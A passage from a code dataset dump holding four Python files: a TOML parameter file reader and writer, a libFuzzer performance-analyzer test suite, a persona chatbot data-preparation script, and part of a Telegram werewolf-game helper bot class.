scipy import stats\n\n# ======================================================================================\n# Common\n# ======================================================================================\n\nParameterComponent = Dict[str, Any]\nEstimate = Real\nDistribution = Union[stats.rv_discrete, stats.rv_continuous]\nSamples = np.ndarray\n\n\nclass Type(Enum):\n POINT_ESTIMATE = \"point-estimate\"\n DISTRIBUTION = \"distribution\"\n SAMPLES = \"samples\"\n\n\ndef read_parameter(file: TextIOBase, component: str) -> ParameterComponent:\n file.seek(0)\n return toml.load(file)[component]\n\n\ndef write_parameter(file: TextIOBase, component: str, parameter: ParameterComponent):\n parameter_data = toml.load(file)\n parameter_data[component] = parameter\n file.seek(0)\n file.truncate()\n toml.dump(parameter_data, file)\n\n\ndef read_type(file: TextIOBase, component: str) -> Type:\n parameter = read_parameter(file, component)\n return Type(parameter[\"type\"])\n\n\n# ======================================================================================\n# Estimate\n# ======================================================================================\n\n\ndef read_estimate(file: TextIOBase, component: str) -> Estimate:\n parameter = read_parameter(file, component)\n if Type(parameter[\"type\"]) is Type.POINT_ESTIMATE:\n # TODO : validate\n return parameter[\"value\"]\n else:\n raise ValueError(f\"{parameter['type']} != 'point-estimate'\")\n\n\ndef write_estimate(file: TextIOBase, component: str, estimate: Estimate):\n write_parameter(\n file, component, {\"type\": \"point-estimate\", \"value\": float(estimate)}\n )\n\n\n# ======================================================================================\n# Distribution\n# ======================================================================================\n\ndistribution_parsers = {\n \"gamma\": lambda data: stats.gamma(a=data[\"shape\"], scale=data[\"scale\"]),\n \"norm\": lambda data: stats.norm(loc=data[\"loc\"], scale=data[\"scale\"]),\n}\n\n\ndef read_distribution(file: TextIOBase, component: str) -> Distribution:\n parameter = read_parameter(file, component)\n if Type(parameter[\"type\"]) is Type.DISTRIBUTION:\n # TODO : validate\n return distribution_parsers[parameter[\"distribution\"]](parameter)\n else:\n raise ValueError(f\"{parameter['type']} != 'distribution'\")\n\n\ndef write_distribution(file: TextIOBase, component: str, distribution: Distribution):\n shape, loc, scale = distribution.dist._parse_args(\n *distribution.args, **distribution.kwds\n )\n parameter = {\n \"type\": \"distribution\",\n \"distribution\": distribution.dist.name,\n }\n if loc:\n parameter[\"loc\"] = loc\n if shape:\n parameter[\"shape\"] = shape[0]\n if scale:\n parameter[\"scale\"] = scale\n write_parameter(\n file, component, parameter,\n )\n\n\n# ======================================================================================\n# Samples\n# ======================================================================================\n\n\ndef read_samples(file: TextIOBase, component: str) -> Samples:\n parameter = read_parameter(file, component)\n if Type(parameter[\"type\"]) is Type.SAMPLES:\n return np.array(parameter[\"samples\"])\n else:\n raise ValueError(f\"{parameter['type']} != 'samples'\")\n\n\ndef write_samples(file: TextIOBase, component: str, samples: Samples):\n write_parameter(file, component, {\"type\": \"samples\", \"samples\": samples.tolist()})\n","sub_path":"data_pipeline_api/file_formats/parameter_file.py","file_name":"parameter_file.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"357792984","text":"# Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for performance_analyzer.\"\"\"\n\nfrom builtins import next\n\nimport json\nimport os\nimport unittest\n\nfrom base import utils\nfrom bot.fuzzers import libfuzzer\nfrom bot.fuzzers.libFuzzer import stats as performance_stats\nfrom handlers.performance_report import performance_analyzer\nfrom system import environment\nfrom tests.test_libs import helpers as test_helpers\n\n# Use default values for stats values usually provided by CF.\nDEFAULT_STATS_PROVIDED_BY_CF = {\n 'actual_duration': 2350,\n 'expected_duration': 2350,\n 'timestamp': 1499904000.017923\n}\n\n\ndef _get_stats_from_log(log_path,\n strategies=None,\n arguments=None,\n stats_overrides=None):\n \"\"\"Calculate stats for the given log the same way as the engine does.\"\"\"\n if strategies is None:\n strategies = []\n if arguments is None:\n arguments = []\n\n log_lines = utils.read_data_from_file(log_path, eval_data=False).splitlines()\n stats = libfuzzer.parse_log_stats(log_lines)\n stats.update(\n performance_stats.parse_performance_features(log_lines, strategies,\n arguments))\n if stats_overrides:\n stats.update(stats_overrides)\n\n return stats\n\n\nclass PerformanceAnalyzerTestBase(unittest.TestCase):\n \"\"\"Performance analysis tests base class.\"\"\"\n\n def setUp(self):\n \"\"\"Prepare test data and necessary env variables.\"\"\"\n test_helpers.patch_environ(self)\n self.data_directory = os.path.join(\n os.path.dirname(__file__), 'performance_analyzer_data')\n self.libfuzzer_data_directory = os.path.join(self.data_directory,\n 'libfuzzer')\n environment.set_value('FAIL_RETRIES', 1)\n\n self.analyzer = performance_analyzer.LibFuzzerPerformanceAnalyzer()\n\n\nclass PerformanceAnalyzerBasicAnalyzerTest(PerformanceAnalyzerTestBase):\n \"\"\"Performance analysis tests for BasicAnalyzer functions.\"\"\"\n\n def assert_basic_analyzer(self,\n basic_analyzer,\n log_filename,\n stats_overrides=None):\n \"\"\"Assert for testing a single basic analyzer.\"\"\"\n extra_stats = DEFAULT_STATS_PROVIDED_BY_CF.copy()\n if stats_overrides:\n extra_stats.update(stats_overrides)\n\n log_file_path = os.path.join(self.libfuzzer_data_directory, 'issue_logs',\n log_filename)\n stats = _get_stats_from_log(log_file_path, stats_overrides=extra_stats)\n self.assertGreater(basic_analyzer(stats), 0.0)\n\n def test_basic_analyzer_for_bad_instrumentation(self):\n \"\"\"Test analyzer_bad_instrumentation BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_bad_instrumentation,\n 'bad_instrumentation_issue.txt')\n\n def test_basic_analyzer_for_coverage(self):\n \"\"\"Test analyzer_coverage BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_coverage,\n 'coverage_issue.txt')\n\n def test_basic_analyzer_for_crash(self):\n \"\"\"Test analyzer_crash BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_crash, 'crash_issue.txt')\n\n def test_basic_analyzer_for_leak(self):\n \"\"\"Test analyzer_leak BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_leak, 'leak_issue.txt')\n\n def test_basic_analyzer_for_logging(self):\n \"\"\"Test analyzer_logging BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_logging,\n 'logging_issue.txt')\n\n def test_basic_analyzer_for_oom(self):\n \"\"\"Test analyzer_oom BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_oom, 'oom_issue.txt')\n\n def test_basic_analyzer_for_slow_unit(self):\n \"\"\"Test analyzer_slow_unit BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_slow_unit,\n 'slow_unit_issue.txt')\n\n def test_basic_analyzer_for_speed(self):\n \"\"\"Test analyzer_speed BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_speed, 'speed_issue.txt')\n\n def test_basic_analyzer_for_startup_crash(self):\n \"\"\"Test analyzer_startup_crash BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_startup_crash,\n 'startup_crash_issue.txt')\n\n def test_basic_analyzer_for_timeout(self):\n \"\"\"Test analyzer_timeout BasicAnalyzer.\"\"\"\n self.assert_basic_analyzer(self.analyzer.analyzer_timeout,\n 'timeout_issue.txt')\n\n\nclass PerformanceAnalyzerTest(PerformanceAnalyzerTestBase):\n \"\"\"Performance analysis tests.\"\"\"\n\n def get_issues(self, log_filename, stats_overrides=None):\n \"\"\"Returns the issue for a particular log file.\"\"\"\n extra_stats = DEFAULT_STATS_PROVIDED_BY_CF.copy()\n if stats_overrides:\n extra_stats.update(stats_overrides)\n\n log_file_path = os.path.join(self.libfuzzer_data_directory, 'issue_logs',\n log_filename)\n stats = _get_stats_from_log(log_file_path, stats_overrides=extra_stats)\n\n analyzer = performance_analyzer.LibFuzzerPerformanceAnalyzer()\n performance_scores, affected_runs_percents, examples = (\n analyzer.analyze_stats([stats]))\n\n return analyzer.get_issues(performance_scores, affected_runs_percents,\n examples)\n\n def assert_log_has_issue_matching(self,\n log_filename,\n expected_issue,\n stats_overrides=None):\n \"\"\"Assert for testing log has a particular issue.\"\"\"\n detected_issues = self.get_issues(log_filename, stats_overrides)\n actual_issue = next(\n (i for i in detected_issues if i['type'] == expected_issue['type']),\n None)\n\n self.assertIsNotNone(\n actual_issue,\n '\"%s\" issue is not found in the result' % expected_issue['type'])\n self.assertEqual(actual_issue['percent'], expected_issue['percent'])\n self.assertEqual(actual_issue['score'], expected_issue['score'])\n\n def assert_log_has_no_issue_matching(self, log_filename, issue_type):\n \"\"\"Assert for testing log has no issue matching a particular type.\"\"\"\n detected_issues = self.get_issues(log_filename)\n detected_issue_types = [i['type'] for i in detected_issues]\n self.assertNotIn(issue_type, detected_issue_types)\n\n def assert_log_has_no_issues(self, log_filename, stats_overrides=None):\n \"\"\"Assert for testing log has no issues.\"\"\"\n expected_issue = {\n 'type': 'none',\n 'percent': 100.0,\n 'score': 0.0,\n 'examples': []\n }\n detected_issues = self.get_issues(log_filename, stats_overrides)\n self.assertEqual(detected_issues, [expected_issue])\n\n def test_bad_instrumentation(self):\n \"\"\"Test bad instrumentation issue.\"\"\"\n expected_issue = {\n 'type': 'bad_instrumentation',\n 'percent': 100.0,\n 'score': 256.0\n }\n self.assert_log_has_issue_matching('bad_instrumentation_issue.txt',\n expected_issue)\n\n def test_coverage(self):\n \"\"\"Test coverage issue.\"\"\"\n expected_issue = {'type': 'coverage', 'percent': 100.0, 'score': 1.0}\n self.assert_log_has_issue_matching('coverage_issue.txt', expected_issue)\n\n def test_crash(self):\n \"\"\"Test crash issue.\"\"\"\n expected_issue = {'type': 'crash', 'percent': 100.0, 'score': 4.0}\n self.assert_log_has_issue_matching('crash_issue.txt', expected_issue)\n\n def test_leak(self):\n \"\"\"Test leak issue.\"\"\"\n expected_issue = {'type': 'leak', 'percent': 100.0, 'score': 128.0}\n self.assert_log_has_issue_matching('leak_issue.txt', expected_issue)\n\n def test_logging(self):\n \"\"\"Test logging issue.\"\"\"\n expected_issue = {'type': 'logging', 'percent': 100.0, 'score': 0.86}\n self.assert_log_has_issue_matching('logging_issue.txt', expected_issue)\n\n def test_oom(self):\n \"\"\"Test oom issue.\"\"\"\n expected_issue = {'type': 'oom', 'percent': 100.0, 'score': 8.0}\n self.assert_log_has_issue_matching('oom_issue.txt', expected_issue)\n\n def test_slow_unit(self):\n \"\"\"Test slow unit issue.\"\"\"\n expected_issue = {'type': 'slow_unit', 'percent': 100.0, 'score': 2.4}\n self.assert_log_has_issue_matching('slow_unit_issue.txt', expected_issue)\n\n def test_speed(self):\n \"\"\"Test speed issue.\"\"\"\n expected_issue = {'type': 'speed', 'percent': 100.0, 'score': 0.99}\n self.assert_log_has_issue_matching('speed_issue.txt', expected_issue)\n\n def test_startup_crash(self):\n \"\"\"Test startup crash issue.\"\"\"\n stats_overrides = {'average_exec_per_sec': 0, 'new_units_added': 0}\n expected_issue = {'type': 'startup_crash', 'percent': 100.0, 'score': 256.0}\n self.assert_log_has_issue_matching('startup_crash_issue.txt',\n expected_issue, stats_overrides)\n\n def test_no_startup_crash(self):\n \"\"\"Test startup crash is not detected when libFuzzer exists early.\"\"\"\n self.assert_log_has_no_issue_matching('startup_crash_no_issue.txt',\n 'startup_crash')\n\n def test_timeout(self):\n \"\"\"Test 'timeout' issue.\"\"\"\n expected_issue = {'type': 'timeout', 'percent': 100.0, 'score': 64.0}\n self.assert_log_has_issue_matching('timeout_issue.txt', expected_issue)\n\n def test_no_logging_with_recommended_dictionaries(self):\n \"\"\"Test no logging issue for a log with recommended dictionaries.\"\"\"\n self.assert_log_has_no_issue_matching(\n 'logging_recommended_dictionary_no_issue.txt', 'logging')\n\n def test_no_logging_with_crash(self):\n \"\"\"Test no logging issue for a log with crash.\"\"\"\n self.assert_log_has_no_issue_matching('logging_crash_no_issue.txt',\n 'logging')\n\n def test_no_logging_with_slow_units(self):\n \"\"\"Test no logging issue for a log with slow units.\"\"\"\n self.assert_log_has_no_issue_matching('logging_slow_units_no_issue.txt',\n 'logging')\n\n def test_no_logging_with_sanitizer_frames(self):\n \"\"\"Test no logging issue for a log with sanitizer warnings.\"\"\"\n self.assert_log_has_no_issue_matching(\n 'logging_sanitizer_warnings_no_issue.txt', 'logging')\n\n def test_no_logging_with_oom(self):\n \"\"\"Test no logging issue for a log with ooms in between frames.\"\"\"\n self.assert_log_has_no_issue_matching('logging_oom_no_issue.txt', 'logging')\n\n def test_no_logging_with_few_runs(self):\n \"\"\"Test no logging issue for a log with few runs.\"\"\"\n self.assert_log_has_no_issue_matching('logging_few_runs_no_issue.txt',\n 'logging')\n\n def test_corpus_subset_run_speed_coverage(self):\n \"\"\"Test corpus subset run is ignored for a log with speed and coverage\n issue.\"\"\"\n self.assert_log_has_no_issues('corpus_subset_no_coverage_speed_issue.txt')\n\n def test_corpus_subset_run_crash(self):\n \"\"\"Test corpus subset run is not ignored for a log with crash.\"\"\"\n expected_issue = {'type': 'crash', 'percent': 100.0, 'score': 4.0}\n self.assert_log_has_issue_matching('corpus_subset_crash_issue.txt',\n expected_issue)\n\n def test_perfect_fuzzer(self):\n \"\"\"Test a perfect fuzzer, i.e. with no issues.\"\"\"\n self.assert_log_has_no_issues('no_issue.txt')\n\n def test_report_generation(self):\n \"\"\"Test report generation for a directory.\"\"\"\n analyzer = performance_analyzer.LibFuzzerPerformanceAnalyzer()\n report_logs_directory = os.path.join(self.libfuzzer_data_directory,\n 'report_logs')\n stats_rows = []\n\n # Use default values for stats values usually provided by CF.\n stats_overrides = DEFAULT_STATS_PROVIDED_BY_CF.copy()\n\n for filename in sorted(os.listdir(report_logs_directory)):\n # Use different timestamp values for each log.\n stats_overrides['timestamp'] += 1\n\n stats_rows.append(\n _get_stats_from_log(\n os.path.join(report_logs_directory, filename),\n stats_overrides=stats_overrides))\n\n performance_scores, affected_runs_percents, examples = (\n analyzer.analyze_stats(stats_rows))\n\n performance_issues = analyzer.get_issues(performance_scores,\n affected_runs_percents, examples)\n performance_report = performance_analyzer.generate_report(\n performance_issues, 'fuzzer1', 'job1')\n\n expected_report = utils.read_data_from_file(\n os.path.join(self.libfuzzer_data_directory, 'expected_report.json'),\n eval_data=False)\n\n self.maxDiff = None # pylint: disable=invalid-name\n self.assertEqual(\n json.loads(performance_report), json.loads(expected_report))\n","sub_path":"src/python/tests/appengine/handlers/performance_report/performance_analyzer_test.py","file_name":"performance_analyzer_test.py","file_ext":"py","file_size_in_byte":13314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"155315381","text":"from __future__ import unicode_literals, print_function, division\nfrom io import open\nimport unicodedata\nimport string\nimport re\nimport random\nimport os\nimport json\n\nimport pandas as pd\n\nimport pandas as pd\nimport copy\n\nimport torch\nimport torch.utils.data\nimport torch.nn as nn\nfrom torch import optim\nimport torch.nn.functional as F\nimport argparse\nfrom sklearn.utils import shuffle\n\nfrom data_conv import GetDataset\nfrom collections import Counter\n\n# Device parameter\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nSOS_token = 1\nEOS_token = 0\n\ncontext_len = 2\n\nclass Vocab:\n def __init__(self, name):\n self.name = name\n self.word2index = {\"EOS\" : 0, \"BOS\" : SOS_token}\n self.word2count = {}\n self.index2word = {0: \"EOS\", SOS_token: \"BOS\"}\n self.n_words = 2 # Count SOS, EOS, EOS, UNK\n\n def addSentence(self, sentence):\n for word in sentence.split(' '):\n self.addWord(word)\n\n def addWord(self, word):\n if word not in self.word2index:\n self.word2index[word] = self.n_words\n self.word2count[word] = 1\n self.index2word[self.n_words] = word\n self.n_words += 1\n else:\n self.word2count[word] += 1\n\n\ndef unicodeToAscii(s):\n return ''.join(\n c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn'\n )\n\ndef normalizeString(s):\n s = unicodeToAscii(s.lower().strip())\n s = re.sub(r\"([.!?])\", r\" \\1\", s)\n s = re.sub(\"[.!?]\", '', s)\n s = re.sub(r\"[^a-zA-Z.!?]+\", r\" \", s)\n return s\n\ndef get_lines(data):\n lines = []\n persona = []\n for i in range(data.length):\n if len(data.diag_history[i]) < 1:\n continue\n cl = min(context_len, len(data.diag_history[i]))\n x1 = \" \".join(data.diag_history[i][(-1*cl):])\n y1 = data.response[i]\n temp = str(x1) + '\\t' + str(y1)\n lines.append(temp)\n pp = data.yourpersona[i]\n persona.append(pp)\n return lines, persona\n\ndef readLangs(auto_encoder=False, reverse=False):\n print(\"Reading lines...\")\n\n train_data = GetDataset('data/train_self_original_no_cands.txt')\n test_data = GetDataset('data/valid_self_original_no_cands.txt')\n\n lines_train, persona_train = get_lines(train_data)\n lines_test, persona_test = get_lines(test_data)\n \n lines = lines_train + lines_test\n persona = persona_train + persona_test\n\n pairs = [[normalizeString(s) for s in l.split('\\t')] for l in lines]\n\n personas = [[normalizeString(s) for s in p] for p in persona] \n\n vocab = Vocab('vocab')\n\n return vocab, pairs, personas\n\n\ndef readPhase(phase, auto_encoder=False, reverse=False):\n print(\"Reading lines...\")\n \n train_data = GetDataset('data/%s_self_original_no_cands.txt'%(phase))\n\n lines, persona = get_lines(train_data)\n \n # Split every line into pairs and normalize\n pairs = [[normalizeString(s) for s in l.split('\\t')] for l in lines]\n\n personas = [[normalizeString(s) for s in p] for p in persona] \n\n return pairs, personas\n\n\ndef filterPair(p, max_input_length):\n return len(p[0].split(' ')) < max_input_length and \\\n len(p[1].split(' ')) < max_input_length\n\ndef filterPairs(pairs, max_input_length):\n pairs = [pair for pair in pairs if filterPair(pair, max_input_length)]\n return pairs\n\ndef prepareData(phase, max_input_length, auto_encoder=False, reverse=False):\n pairs, personas = readPhase(phase, auto_encoder, reverse)\n print(\"Read %s sentence pairs\" % len(pairs))\n return pairs, personas\n\ndef prepareVocab():\n vocab, pairs, personas = readLangs()\n print(\"Read %s sentence pairs\" % len(pairs))\n\n with open(\"emo_lbl.txt\", \"r\") as read_it: \n emo_data = json.load(read_it)\n\n for i in emo_data: \n vocab.addWord(emo_data[i])\n print(\"Counting words...\")\n\n for pair in pairs:\n vocab.addSentence(pair[0])\n vocab.addSentence(pair[1])\n for p in personas:\n for s in p:\n vocab.addSentence(s)\n \n print(\"Counted words:\")\n print(vocab.name, vocab.n_words)\n\n return vocab\n\n\ndef prepareVocab2():\n vocab, pairs, personas = readLangs()\n\n print(\"Read %s sentence pairs\" % len(pairs))\n\n with open(\"emo_lbl.txt\", \"r\") as read_it: \n emo_data = json.load(read_it)\n\n for i in emo_data: \n vocab.addWord(emo_data[i])\n print(\"Getting top k words...\")\n\n\n vocab2 = prepareVocab()\n \n k = Counter(vocab2.word2count) \n\n high = k.most_common(120)\n\n for i in high:\n vocab.addWord(i[0])\n \n print(\"Counted words:\")\n print(vocab.name, vocab.n_words)\n\n return vocab\n\nclass CreateVocab():\n\n def __init__(self):\n vocab = prepareVocab2()\n self.vocab = vocab\n\n def voc(self):\n return self.vocab\n\n def __len__(self):\n return len(self.vocab)\n\n\nclass Dataset():\n \"\"\"dataset object\"\"\"\n\n def __init__(self, phase, vocab, num_embeddings=None, max_input_length=None, transform=None, auto_encoder=False):\n \"\"\"\n The initialization of the dataset object.\n :param phase: train/test.\n :param num_embeddings: The embedding dimentionality.\n :param max_input_length: The maximum enforced length of the sentences.\n :param transform: Post processing if necessary.\n :param auto_encoder: If we are training an autoencoder or not.\n \"\"\"\n\n # Skip and eliminate the sentences with a length larger than max_input_length!\n pairs, personas = prepareData(phase, max_input_length, auto_encoder=auto_encoder, reverse=False)\n\n if phase == \"train\":\n pairs, personas = shuffle(pairs, personas)\n\n print(pairs[0])\n print(personas[0])\n\n print((\"Total pairs and personas {} - {}\").format(len(pairs), len(pairs)))\n\n self.transform = transform\n self.num_embeddings = num_embeddings\n self.max_input_length = max_input_length\n self.vocab = vocab\n self.pairs = pairs\n self.personas = personas \n\n def vocab(self):\n return self.vocab\n\n def pairs(self):\n return self.pairs\n\n def __len__(self):\n return len(self.pairs)\n\n\nMAX_INPUT_LEN = 100\n\nfrom annotate import annotate\n# Creating the vocabulary object\ncv = CreateVocab()\nvoc = cv.voc()\nvocab = voc\n\n# Create training data object\ntrainset = Dataset(phase='train', vocab=vocab, max_input_length=MAX_INPUT_LEN)\ntrain_pairs = trainset.pairs\ntrain_personas = trainset.personas\n\nmax_l = 0\n\n\n# Create testing data object\ntestset = Dataset(phase='valid', vocab=vocab, max_input_length=MAX_INPUT_LEN)\ntest_pairs = testset.pairs\ntest_personas = testset.personas\n\ntpair = test_pairs\nttpairs = copy.deepcopy(tpair)\ntper = test_personas\ntpersona = copy.deepcopy(tper)\n\n# Replacing the unknown words\ndef replace_unk(sentence):\n ifs = []\n for word in sentence.split(' '):\n if word in voc.word2index:\n ifs.append(word)\n else:\n ifs.append(\"UNK\")\n return ' '.join(ifs)\n\nfor i in range(len(train_pairs)):\n train_pairs[i][0] = replace_unk(normalizeString(train_pairs[i][0]))\n train_pairs[i][1] = replace_unk(normalizeString(train_pairs[i][1]))\n\nfor i in range(len(test_pairs)):\n test_pairs[i][0] = replace_unk(normalizeString(test_pairs[i][0]))\n test_pairs[i][1] = replace_unk(normalizeString(test_pairs[i][1]))\n\nfor i in range(len(train_personas)):\n for j in range(len(train_personas[i])):\n train_personas[i][j] = replace_unk(normalizeString(train_personas[i][j]))\n\nfor i in range(len(test_personas)):\n for j in range(len(test_personas[i])):\n test_personas[i][j] = replace_unk(normalizeString(test_personas[i][j]))\n\n\nparser = argparse.ArgumentParser(description='Chatbot')\nparser.add_argument(\"--gpu_id\", type=int, default = 0, help=\"For selecting the gpu id\")\nparser.add_argument(\"--output_file\", type=str, default = \"results/Temp\", help=\"For ouput file names\")\nparser.add_argument(\"--message\", type=str, default = \"Temp\", help=\"For ouput file names\")\n\n\n# Add all arguments to parser\nargs = parser.parse_args()\n\n\nsentences = []\nfor i in range(len(train_pairs)):\n sentences.append(train_pairs[i][0])\nemo_annotate_train_0 = annotate(sentences, args.gpu_id)\n\nsentences = []\nfor i in range(len(train_pairs)):\n sentences.append(train_pairs[i][1])\nemo_annotate_train_1 = annotate(sentences, args.gpu_id)\n\nsentences = []\nfor i in range(len(test_pairs)):\n sentences.append(test_pairs[i][0])\nemo_annotate_test_0 = annotate(sentences, args.gpu_id)\n\nsentences = []\nfor i in range(len(test_pairs)):\n sentences.append(test_pairs[i][1])\nemo_annotate_test_1 = annotate(sentences, args.gpu_id)\n\nfor i in range(len(train_personas)):\n for j in range(len(train_personas[i])):\n if len(train_personas[i][j].split(' ')) > max_l:\n max_l = len(train_personas[i][j].split(' '))\n\nfor i in range(len(train_pairs)):\n if len(train_personas[i][0].split(' ')) > max_l:\n max_l = len(train_pairs[i][0].split(' '))\n\nfor i in range(len(test_personas)):\n for j in range(len(test_personas[i])):\n if len(test_personas[i][j].split(' ')) > max_l:\n max_l = len(test_personas[i][j].split(' ')) \n\nfor i in range(len(test_pairs)):\n if len(test_pairs[i][0].split(' ')) > max_l:\n max_l = len(test_pairs[i][0].split(' '))\n\n\nmax_l = max_l + 5\nprint(\"Max Len : \", max_l)\n\nfor i in range(len(train_pairs)):\n if len(train_pairs[i][0].split(' ')) < max_l:\n train_pairs[i][0] += ' EOS'\n while len(train_pairs[i][0].split(' ')) < max_l:\n train_pairs[i][0] += ' EOS'\n if len(train_pairs[i][1].split(' ')) < max_l:\n train_pairs[i][1] += ' EOS'\n while len(train_pairs[i][1].split(' ')) < max_l:\n train_pairs[i][1] += ' EOS'\n\nfor i in range(len(test_pairs)):\n if len(test_pairs[i][0].split(' ')) < max_l:\n test_pairs[i][0] += ' EOS'\n while len(test_pairs[i][0].split(' ')) < max_l:\n test_pairs[i][0] += ' EOS'\n if len(test_pairs[i][1].split(' ')) < max_l:\n test_pairs[i][1] += ' EOS'\n while len(test_pairs[i][1].split(' ')) < max_l:\n test_pairs[i][1] += ' EOS'\n\nfor i in range(len(train_personas)):\n while len(train_personas[i]) < 5:\n train_personas[i].append(\"\")\n train_personas[i] = train_personas[i][:5]\n for j in range(len(train_personas[i])):\n if len(train_personas[i][j].split(' ')) < max_l:\n train_personas[i][j] += ' EOS'\n while len(train_personas[i][j].split(' ')) < max_l:\n train_personas[i][j] += ' EOS'\n\nfor i in range(len(test_personas)):\n while len(test_personas[i]) < 5:\n test_personas[i].append(\"\")\n test_personas[i] = test_personas[i][:5]\n for j in range(len(test_personas[i])):\n if len(test_personas[i][j].split(' ')) < max_l:\n test_personas[i][j] += ' EOS'\n while len(test_personas[i][j].split(' ')) < max_l:\n test_personas[i][j] += ' EOS'\n\n\noutput_file = open(\"persona.txt\", \"w\")\n\nfor i in range(len(train_pairs)):\n output_file.write(train_pairs[i][0] + \"\\t\" + train_pairs[i][1])\n output_file.write(\"\\t\" + emo_annotate_train_0[i] + \"\\t\" + emo_annotate_train_1[i])\n for j in range(len(train_personas[i])):\n output_file.write(\"\\t\" + train_personas[i][j])\n output_file.write(\"\\n\")\noutput_file.close()\n\noutput_file = open(\"persona_test.txt\", \"w\")\n\nfor i in range(len(test_pairs)):\n output_file.write(test_pairs[i][0] + \"\\t\" + test_pairs[i][1])\n output_file.write(\"\\t\" + emo_annotate_test_0[i] + \"\\t\" + emo_annotate_test_1[i])\n for j in range(len(test_pairs[i])):\n output_file.write(\"\\t\" + test_pairs[i][j])\n output_file.write(\"\\n\")\noutput_file.close()\n","sub_path":"r.py","file_name":"r.py","file_ext":"py","file_size_in_byte":11685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"623048467","text":"from . import data_database_queries, helper_database_queries, ali_db, main_bot, beta_bot, log_to_lab\nfrom . import rs_bot, web_app_address\nimport time\nfrom requests import post\nfrom pyrogram.errors import UserNotParticipant, FloodWait\n\nclass Chat:\n\n def __init__(self, client, chat_id):\n self.client = client\n self.id = self.chat_id = chat_id\n\n @property\n def setting(self):\n return helper_database_queries.get_group_setting(self.id)\n\n @staticmethod\n def is_spy(client):\n try:\n return client.is_spy\n except:\n return False\n\n def set_group_state(self, state):\n data_database_queries.set_group_state(self.id, state)\n\n class UserData:\n def __init__(self, user, first_name):\n self.user = user\n self.first_name = first_name\n self.is_alive = True\n self.is_winner = True\n self.status = 'member'\n self.role_id = 0\n\n def add_new_game(self, msg_id, user):\n data_database_queries.add_new_game(self.id, msg_id, user)\n self.set_group_state('jointime')\n print(self.id, ' new game')\n\n def join_time_pin(self, message):\n settings = self.setting\n if settings and not Chat.is_spy(self.client):\n if settings['jointime_pin']:\n try:\n rs_bot.pin_chat_message(message.chat.id, message.message_id)\n except Exception as e:\n print(e)\n message.reply_text(\"/pinn@ExecutrixBot\")\n time.sleep(5)\n if settings['is_fillit_enable']:\n message.reply_text(\"/fillit@TsWwPlus_Bot\")\n\n def send_next_pin(self):\n settings = self.setting\n if settings and not Chat.is_spy(self.client):\n try:\n if settings.game_started_pin:\n try:\n res = post('{}/v1/game_started_pin'.format(web_app_address), json={'chat_id': self.id})\n res = res.json()\n if not res['error']:\n return\n except Exception as e:\n print(e)\n self.client.send_message(\n chat_id=self.id,\n text=\"#next\")\n except:\n pass\n self.set_group_state('ingame')\n\n\n def delete_join_link(self):\n ali_db.delete_link(self.id)\n\n def first_list(self, message):\n users_data = [ent.user.id for ent in message.entities if ent.type == 'text_mention']\n try:\n settings = self.setting\n if settings and not Chat.is_spy(self.client):\n if self.id in helper_database_queries.manager_chats:\n message.reply_text(\"/tag_del@manage_ww_bot\", quote=False)\n if settings.role_saver:\n if settings.role_saver == 1:\n res = post('{}/v1/uploadFirstList'.format(web_app_address), json={\n 'chat_id': self.id,\n 'message_id': message.message_id,\n 'text': message.text,\n 'users': users_data\n })\n try:\n res = res.json()\n if not res['error']:\n return\n except Exception as e:\n print(e)\n message.reply_text(\"/up@role_ww_bot\")\n elif settings.role_saver == 2:\n message.reply_text(\"/new@TsWwPlus_Bot\")\n except:\n pass\n print(self.id, ' first list')\n self.set_group_state('ingame')\n\n def start_game(self, message):\n players = [ent.user.id for ent in message.entities if ent.type == 'text_mention']\n print(self.id, ' game star t', players, len(players))\n data_database_queries.start_game(self.id, len(players))\n\n def game_list(self, message):\n settings = self.setting\n if settings and not Chat.is_spy(self.client):\n if settings.role_saver:\n if settings.role_saver == 1:\n users_data = [ent.user.id for ent in message.entities if ent.type == 'text_mention']\n res = post('{}/v1/uploadGameList'.format(web_app_address), json={\n 'chat_id': self.id,\n 'message_id': message.message_id,\n 'text': message.text,\n 'users': users_data\n })\n try:\n res = res.json()\n if not res['error']:\n return\n except Exception as e:\n print(e)\n message.reply_text(\"/up@role_ww_bot\")\n elif settings.role_saver == 2:\n message.reply_text(\"/tsup@TsWwPlus_Bot\")\n print(self.id, ' game list')\n\n def game_finish(self, message):\n settings = self.setting\n user = message.from_user.id\n if settings and not Chat.is_spy(self.client):\n try:\n res = post('{}/v1/finishGame'.format(web_app_address), json={\n 'chat_id': self.id,\n 'message_id': message.message_id\n })\n try:\n res.json()\n except Exception as e:\n print(e)\n\n if self.id in [-1001232594917, -1001414470547]:\n message.reply_text(\"/getpoints\")\n time.sleep(1)\n\n if settings.is_confirm_tsww_enable:\n message.reply_text(\"/confirm@TsWwPlus_Bot\")\n time.sleep(1)\n\n if settings.is_startnewgame_enable:\n if settings.start_mode == 1:\n msg = \"/startchaos\"\n else:\n msg = \"/startgame\"\n if user == 